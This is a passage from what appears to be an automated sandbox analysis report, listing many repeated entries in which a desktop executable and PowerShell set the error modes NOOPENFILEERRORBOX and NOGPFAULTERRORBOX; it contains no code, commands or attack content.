                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
